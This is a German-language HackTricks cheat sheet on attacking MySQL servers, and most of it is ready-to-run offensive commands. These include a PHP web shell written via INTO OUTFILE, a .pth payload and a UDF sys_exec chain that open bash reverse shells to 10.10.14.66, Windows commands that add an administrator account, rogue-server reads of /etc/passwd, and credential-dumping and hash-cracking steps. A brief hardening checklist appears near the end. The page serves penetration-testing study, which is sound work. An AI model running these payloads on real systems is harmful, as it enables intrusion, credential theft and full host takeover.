3306 - Pentesting Mysql

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Grundlegende Informationen

MySQL kann als ein Open-Source Relational Database Management System (RDBMS) beschrieben werden, das kostenlos verfügbar ist. Es arbeitet mit der Structured Query Language (SQL) und ermöglicht die Verwaltung und Manipulation von Datenbanken.

Standardport: 3306

3306/tcp open  mysql

Verbinden

Lokal

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Fernzugriff

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Externe Enumeration

Einige der enumeration actions erfordern gültige credentials

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Beliebige Binärdaten schreiben

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL-Befehle

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL: Berechtigungen ermitteln

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Du kannst in der Dokumentation die Bedeutung jeder Berechtigung nachlesen: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python .pth RCE (site-spezifische Konfigurations-Hooks)

Durch Missbrauch des klassischen INTO OUTFILE-Primitives ist es möglich, beliebige Codeausführung auf Zielen zu erreichen, die später Python-Skripte ausführen.

1. Verwende INTO OUTFILE, um eine benutzerdefinierte .pth-Datei in einem von site.py automatisch geladenen Verzeichnis abzulegen (z. B. .../lib/python3.10/site-packages/).
2. Die .pth-Datei kann eine einzige Zeile enthalten, die mit import beginnt, gefolgt von beliebigem Python-Code, der bei jedem Start des Interpreters ausgeführt wird.
3. Wenn der Interpreter implizit von einem CGI-Skript ausgeführt wird (zum Beispiel /cgi-bin/ml-draw.py mit Shebang #!/bin/python), wird die Payload mit denselben Rechten wie der Webserver-Prozess ausgeführt (FortiWeb hat es als root ausgeführt → vollständiges pre-auth RCE).

Beispiel-.pth-Payload (einzelne Zeile, es dürfen keine Leerzeichen in der finalen SQL-Payload enthalten sein, daher sind hex/UNHEX() oder String-Konkatenation erforderlich):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Beispiel für das Erstellen der Datei durch eine UNION-Abfrage (Leerzeichen durch /**/ ersetzt, um einen sscanf("%128s")-Leerzeichenfilter zu umgehen und die Gesamtlänge ≤128 Bytes zu halten):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Wichtige Einschränkungen & Umgehungen:

• INTO OUTFILE kann vorhandene Dateien nicht überschreiben; wähle einen neuen Dateinamen.
• Der Dateipfad wird relativ zum CWD von MySQL aufgelöst, daher hilft ein Präfix mit ../../, den Pfad zu verkürzen und Beschränkungen für absolute Pfade zu umgehen.
• Wenn die Eingabe des Angreifers mit %128s (oder ähnlich) extrahiert wird, wird jedes Leerzeichen die Nutzlast abschneiden; verwende MySQL-Comment-Sequenzen /**/ oder /*!*/, um Leerzeichen zu ersetzen.
• Der MySQL-Benutzer, der die Abfrage ausführt, benötigt das FILE-Privileg, aber in vielen Appliances (z. B. FortiWeb) läuft der Dienst als root, wodurch Schreibzugriff nahezu überall möglich ist.

Nachdem die .pth abgelegt wurde, genügt es, jede CGI anzufordern, die vom python interpreter gehandhabt wird, um code execution zu erhalten:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

Der Python-Prozess importiert die bösartige .pth automatisch und führt die shell payload aus.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL arbitrary read file by client

Tatsächlich, wenn du versuchst, mit load data local into a table den Inhalt einer Datei in eine Tabelle zu laden, fordert der MySQL- oder MariaDB-Server den client auf, diese zu lesen und den Inhalt zu senden. Wenn du also einen mysql client manipulieren kannst, damit er sich mit deinem eigenen MySQL-Server verbindet, kannst du beliebige Dateien lesen.
Bitte beachte, dass dies das Verhalten ist, wenn folgendes verwendet wird:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Beachte das Wort “local”)
Denn ohne das “local” kannst du Folgendes erhalten:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Erster PoC: https://github.com/allyshka/Rogue-MySql-Server
In diesem Paper finden Sie eine vollständige Beschreibung des Angriffs und sogar, wie man ihn zu RCE erweitert: https://paper.seebug.org/1113/
Hier finden Sie eine Übersicht über den Angriff: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Mysql-Benutzer

Es ist besonders interessant, wenn mysql als root läuft:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Gefährliche Einstellungen von mysqld.cnf

In der Konfiguration von MySQL-Services werden verschiedene Einstellungen verwendet, um Betrieb und Sicherheitsmaßnahmen zu definieren:

• Die user-Einstellung wird verwendet, um den Benutzer festzulegen, unter dem der MySQL-Dienst ausgeführt wird.
• password wird zum Festlegen des Passworts für den MySQL-Benutzer verwendet.
• admin_address gibt die IP-Adresse an, die auf dem Verwaltungsnetzwerk-Interface für TCP/IP-Verbindungen lauscht.
• Die debug-Variable zeigt die aktuellen Debug-Konfigurationen an, einschließlich sensibler Informationen in den logs.
• sql_warnings steuert, ob Informationsstrings für einzelne INSERT-Anweisungen erzeugt werden, wenn Warnungen auftreten, und dadurch sensible Daten in den logs enthalten sein können.
• Mit secure_file_priv wird der Bereich von Datenimport- und -exportoperationen eingeschränkt, um die Sicherheit zu erhöhen.

Lokale Linux enumeration

Wenn Sie bereits Shell-Zugang auf dem Host haben, sind die schnellsten Erfolge normalerweise local sockets, client credential files und auth plugins, die einen OS user in ein DB account abbilden.

Pfade und Artefakte mit hoher Relevanz:

ls -l /run/mysqld/mysqld.sock /var/run/mysqld/mysqld.sock 2>/dev/null
ls -l /etc/mysql/debian.cnf ~/.my.cnf ~/.mylogin.cnf 2>/dev/null
grep -RNI -E '^(bind-address|skip-networking|socket)\\b' /etc/mysql /etc/my.cnf* 2>/dev/null

Wenn der lokale Socket erreichbar ist, untersuche Benutzer/Plugins und die effektive Identität:

mysql -S /run/mysqld/mysqld.sock -u root -e \
"SELECT user,host,plugin,account_locked FROM mysql.user;" 2>/dev/null
mysql -S /run/mysqld/mysqld.sock -u root -e \
"SELECT USER(),CURRENT_USER();" 2>/dev/null

Worauf achten:

• auth_socket / unix_socket bei privilegierten Benutzern: ein OS-Benutzer kann sich über den lokalen Socket zu einem DB-Benutzer machen ohne DB-Passwort
• lesbare /etc/mysql/debian.cnf oder ~/.my.cnf Dateien
• secure_file_priv leer oder zeigt auf ein beschreibbares Verzeichnis
• local_infile aktiviert, wenn es nicht benötigt wird

Schnelle Sicherheitschecks:

mysql -S /run/mysqld/mysqld.sock -u root -e "
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'local_infile';
SHOW GRANTS FOR CURRENT_USER();
" 2>/dev/null

Privilegieneskalation

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation via library

Wenn der mysql server als root läuft (oder als ein anderer, höher privilegierter Benutzer), kannst du ihn dazu bringen, Befehle auszuführen. Dazu musst du user defined functions verwenden. Um eine solche Funktion anzulegen, benötigst du eine Bibliothek für das OS, auf dem mysql läuft.

Die bösartige Bibliothek findest du in sqlmap und in metasploit, indem du locate "*lib_mysqludf_sys*" ausführst. Die .so-Dateien sind linux-Bibliotheken und die .dll die Windows-Versionen — wähle die passende aus.

Wenn du diese Bibliotheken nicht hast, kannst du entweder danach suchen, oder diesen linux C code herunterladen und ihn auf der verwundbaren linux-Maschine kompilieren:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Jetzt, da Sie die Bibliothek haben, melden Sie sich in MySQL als privilegierter Benutzer (root?) an und führen Sie die folgenden Schritte aus:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Windows Tipp: Verzeichnisse mit NTFS ADS aus SQL erstellen

Unter NTFS kann man die Erstellung von Verzeichnissen über einen alternativen Datenstrom (ADS) erzwingen, selbst wenn nur eine Datei-Schreibprimitive vorhanden ist. Wenn die klassische UDF-Kette ein plugin-Verzeichnis erwartet, das jedoch nicht existiert und @@plugin_dir unbekannt oder gesperrt ist, kann man es zuerst mit ::$INDEX_ALLOCATION erstellen:

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

Das verwandelt das eingeschränkte SELECT ... INTO OUTFILE in eine vollständigere Primitive auf Windows-Stacks, indem die für UDF drops benötigte Ordnerstruktur erzeugt wird.

Extrahieren von MySQL-Anmeldeinformationen aus Dateien

In /etc/mysql/debian.cnf finden Sie das Klartext-Passwort des Benutzers debian-sys-maint

cat /etc/mysql/debian.cnf

Du kannst diese credentials verwenden, um dich in die mysql Datenbank einzuloggen.

In der Datei: /var/lib/mysql/mysql/user.MYD findest du alle hashes der MySQL-Benutzer (die, die du aus mysql.user innerhalb der Datenbank extrahieren kannst).

Du kannst sie extrahieren, indem du Folgendes ausführst:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Logging aktivieren

Sie können das Logging von MySQL-Abfragen in /etc/mysql/my.cnf aktivieren, indem Sie die folgenden Zeilen entkommentieren:

Nützliche Dateien

Konfigurationsdateien

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Befehlsverlauf
• ~/.mysql.history
• Protokolldateien
• connections.log
• update.log
• common.log

Standard-MySQL-Datenbanken/Tabellen

HackTricks automatische Befehle

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

2023–2025 Höhepunkte (neu)

JDBC propertiesTransform deserialization (CVE-2023-21971)

Ab Connector/J <= 8.0.32 kann ein Angreifer, der die JDBC URL beeinflussen kann (z. B. in Drittsoftware, die nach einem connection string fragt), über den Parameter propertiesTransform verlangen, dass beliebige Klassen auf der client‑Seite geladen werden. Wenn ein Gadget auf dem class-path ladbar ist, führt das zu remote code execution in the context of the JDBC client (pre-auth, da keine gültigen Anmeldedaten erforderlich sind). Ein minimales PoC sieht wie folgt aus:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Das Ausführen von Evil.class kann so einfach sein, wie diese auf dem class-path der verwundbaren Anwendung bereitzustellen oder einen rogue MySQL server ein bösartiges serialisiertes Objekt senden zu lassen. Das Problem wurde in Connector/J 8.0.33 behoben – aktualisiere den Treiber oder setze propertiesTransform explizit auf eine allow-list. (Siehe Snyk write-up für Details)

Rogue / Fake MySQL server attacks against JDBC clients

Mehrere Open-Source-Tools implementieren ein partielles MySQL-Protokoll, um JDBC-Clients anzugreifen, die nach außen verbinden:

• mysql-fake-server (Java, supports file read and deserialization exploits)
• rogue_mysql_server (Python, similar capabilities)

Typische Angriffswege:

1. Die Opfer-Anwendung lädt mysql-connector-j mit allowLoadLocalInfile=true oder autoDeserialize=true.
2. Der Angreifer kontrolliert DNS / Host-Einträge, sodass der Hostname der DB auf eine Maschine unter seiner Kontrolle aufgelöst wird.
3. Ein bösartiger Server antwortet mit speziell präparierten Paketen, die entweder LOCAL INFILE arbitrary file read oder Java deserialization auslösen → RCE.

Beispiel-One-Liner, um einen fake server zu starten (Java):

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Dann weise die Opferanwendung auf jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true und lese /etc/passwd, indem du den Dateinamen im username-Feld als Base64 kodierst (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Cracking caching_sha2_password hashes

MySQL ≥ 8.0 speichert Passwort-Hashes als $mysql-sha2$ (SHA-256). Sowohl Hashcat (mode 21100) als auch John-the-Ripper (--format=mysql-sha2) unterstützen seit 2023 Offline-Cracking. Dump die Spalte authentication_string und füttere sie direkt:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Härtungs-Checkliste (2025)

• Set LOCAL_INFILE=0 und --secure-file-priv=/var/empty, um die meisten Datei-Lese-/Schreib-Primitiven zu unterbinden.
• Entfernen Sie das FILE-Privileg von Anwendungskonten.
• In Connector/J setzen Sie allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (leer).
• Deaktivieren Sie ungenutzte Authentifizierungs-Plugins und erzwingen Sie TLS (require_secure_transport = ON).
• Überwachen Sie CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL und plötzliche SET GLOBAL-Anweisungen.

Referenzen

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• The Art of PHP: CTF‑born exploits and techniques

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.